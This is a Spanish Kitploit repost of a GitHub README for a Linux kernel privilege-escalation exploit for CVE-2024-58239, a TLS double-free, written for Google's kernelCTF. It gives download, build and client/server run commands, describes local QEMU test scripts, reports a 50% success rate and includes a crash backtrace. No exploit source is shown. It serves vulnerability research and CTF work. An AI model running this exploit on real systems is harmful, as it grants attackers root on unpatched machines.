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cve-2024-58239 — Exploit del subsistema TLS del kernel de Linux para CVE-2024-58239, que logra escalada de privilegios mediante una vulnerabilidad de doble liberación en tcp_rcv_state_process. Incluye arquitectura cliente-servidor y scripts de pruebas locales. | Kitploit
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GitHubkhoatran107/cve-2024-58239

cve-2024-58239

Exploit del subsistema TLS del kernel de Linux para CVE-2024-58239, que logra escalada de privilegios mediante una vulnerabilidad de doble liberación en tcp_rcv_state_process. Incluye arquitectura cliente-servidor y scripts de pruebas locales.

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42hace 10 mesesAún no revisado

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exploit de mitigación CVE-2024-58239

Este es mi primer exploit de 1 día.

Parche: tls: stop recv() if initial process_rx_list gave us non-DATA

Vi exp407 en la hoja de cálculo de kernelCTF e intenté reproducir el exploit.

Logré ejecutar el exploit en el entorno de kernelCTF y obtuve la bandera: image

Escribiré un análisis detallado de esto más adelante.

El registro del exploit es algo largo, debido a un AVISO del kernel en medio. Sin embargo, un aviso no es un error y no mata mi exploit ;) image

Estructura de carpetas

Elimino muchos archivos pesados de esta carpeta.

  • ./rootfs_v3.img
  • ./ramdisk_v1.img
./releases/mitigation-v4-6.6/bzImage
  • ./releases/mitigation-v4-6.6/vmlinux
  • Puedes obtener los primeros 3 archivos ejecutando original local_runner.sh

    Para el cuarto y el código fuente, puedes conectarte al servidor de kernelCTF y obtener enlaces para descargar.

    Pero para tu comodidad, aquí está la información de la instancia mitigation-v4-6.6:

    root@kitploit:~
    Kernel image (bzImage): https://storage.googleapis.com/kernelctf-build/releases/mitigation-v4-6.6/bzImage
    Kernel image (vmlinux): https://storage.googleapis.com/kernelctf-build/releases/mitigation-v4-6.6/vmlinux.gz
    Kernel config: https://storage.googleapis.com/kernelctf-build/releases/mitigation-v4-6.6/.config
      -> derived from COS config: https://storage.googleapis.com/kernelctf-build/releases/mitigation-v4-6.6/lakitu_defconfig
    Source code info: https://storage.googleapis.com/kernelctf-build/releases/mitigation-v4-6.6/COMMIT_INFO
    

    Además, los comandos para descargar archivos .img:

    root@kitploit:~
    wget https://storage.googleapis.com/kernelctf-build/files/rootfs_v3.img.gz
    gzip -d rootfs_v3.img.gz
    wget https://storage.googleapis.com/kernelctf-build/files/ramdisk_v1.img
    

    Compilación del exploit

    root@kitploit:~
    cd ./exploit/mitigation-v4-6.6/
    make
    

    Ejecución del exploit

    Este exploit se divide en 2 partes:

    • el servidor que se ejecuta primero en un VPS.
    • el cliente que se ejecuta después en la máquina objetivo.

    Servidor:

    root@kitploit:~
    ./server --port <port>
    

    Cliente:

    root@kitploit:~
    ./client --ip <server_ip> --port <port>
    

    Pruebas locales

    Escribí 2 scripts para probar el exploit localmente:

    test.py

    Este inicia el servidor en segundo plano y luego ejecuta el cliente en la máquina virtual qemu.

    Configuración

    Primero, ve a exploit/mitigation-v4-6.6 e inicia un servidor http en el puerto 3000, para descargar el exploit a la máquina virtual qemu más tarde.

    root@kitploit:~
    cd exploit/mitigation-v4-6.6
    python3 -m http.server 3000
    

    Uso

    Luego, en otra terminal, inicia el script:

    root@kitploit:~
    python3 test.py <your_ip> <port>
    
    • <your_ip> es la IP de tu tarjeta de red. En mi caso, ejecuto todo en WSL, ejecuto ip a y obtengo la IP de la interfaz eth0, 172.30.248.93
    root@kitploit:~
    ➜  CVE-2024-58239 git:(main) ip a
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
           valid_lft forever preferred_lft forever
        inet 10.255.255.254/32 brd 10.255.255.254 scope global lo
           valid_lft forever preferred_lft forever
        inet6 ::1/128 scope host
           valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
        link/ether 00:15:5d:22:a0:d1 brd ff:ff:ff:ff:ff:ff
        inet 172.30.248.93/20 brd 172.30.255.255 scope global eth0
           valid_lft forever preferred_lft forever
        inet6 fe80::215:5dff:fe22:a0d1/64 scope link
           valid_lft forever preferred_lft forever
    
    • <port> es cualquier puerto no utilizado en tu máquina local. Es para la conexión TLS entre el cliente y el servidor.

    calc_AC_rate.py

    Este ejecuta el exploit varias veces y mide la tasa de éxito del mismo.

    Configuración

    Al igual que en el uso de test.py, ve a exploit/mitigation-v4-6.6 e inicia un servidor http en el puerto 3000, para descargar el exploit a la máquina virtual qemu más tarde.

    root@kitploit:~
    cd exploit/mitigation-v4-6.6
    python3 -m http.server 3000
    

    Uso

    root@kitploit:~
    python3 calc_AC_rate.py <your_ip> <port> <number_of_time_to_run>
    

    Por ejemplo, en mi WSL, lo ejecuto como python3 calc_AC_rate.py 172.30.248.93 1118 100.

    Tasa de éxito

    Todavía estoy trabajando en la tasa de éxito, ya que ahora es un poco inestable.

    Ejecuté calc_AC_rate.py para probar el exploit 100 veces, y el resultado es 50/100.

    En los intentos fallidos, es porque common_interrupt aparece en medio, activando la detección ingenua de doble liberación en el slab del kernel, como se muestra en este backtrace.

    Encontraré una forma de desactivarlo.

    root@kitploit:~
    [    4.050330]  ? die+0x32/0x80
    [    4.050809]  ? do_trap+0xd6/0x100
    [    4.051365]  ? __slab_free+0x16c/0x380
    [    4.052198]  ? do_error_trap+0x6a/0x90
    [    4.052767]  ? __slab_free+0x16c/0x380
    [    4.053350]  ? exc_invalid_op+0x4c/0x60
    [    4.053916]  ? __slab_free+0x16c/0x380
    [    4.055031]  ? asm_exc_invalid_op+0x16/0x20
    [    4.055675]  ? tcp_rcv_state_process+0x791/0xef0
    [    4.056527]  ? __slab_free+0x16c/0x380
    [    4.057097]  ? lock_timer_base+0x61/0x80
    [    4.057795]  ? tcp_get_metrics+0x142/0x380
    [    4.058560]  ? tcp_rcv_state_process+0x791/0xef0
    [    4.059265]  kmem_cache_free+0x599/0x5e0
    [    4.059915]  tcp_rcv_state_process+0x791/0xef0
    [    4.060918]  ? security_sock_rcv_skb+0x31/0x50
    [    4.061857]  ? sk_filter_trim_cap+0x11a/0x290
    [    4.062558]  tcp_v4_do_rcv+0xcd/0x280
    [    4.063281]  tcp_v4_rcv+0xf81/0x1010
    [    4.063832]  ? raw_local_deliver+0xcd/0x250
    [    4.064668]  ip_protocol_deliver_rcu+0x32/0x320
    [    4.065355]  ip_local_deliver_finish+0x7a/0xa0
    [    4.066455]  ip_sublist_rcv_finish+0x7e/0x90
    [    4.067231]  ip_sublist_rcv+0x1e1/0x220
    [    4.067919]  ? __netif_receive_skb_core.constprop.0+0xbf/0x1080
    [    4.068822]  ip_list_rcv+0x139/0x170
    [    4.069362]  __netif_receive_skb_list_core+0x29d/0x2c0
    [    4.070173]  ? __pfx_csum_block_add_ext+0x10/0x10
    [    4.071054]  netif_receive_skb_list_internal+0x1e1/0x310
    [    4.072068]  napi_complete_done+0x6e/0x1a0
    [    4.072752]  virtnet_poll+0x40d/0x5a0
    [    4.073313]  __napi_poll+0x28/0x1c0
    [    4.073854]  net_rx_action+0x14c/0x2d0
    [    4.074622]  ? vp_vring_interrupt+0x73/0x90
    [    4.075746]  __do_softirq+0xf6/0x30f
    [    4.076379]  __irq_exit_rcu+0x79/0xc0
    [    4.077356]  common_interrupt+0xb9/0xd0
    
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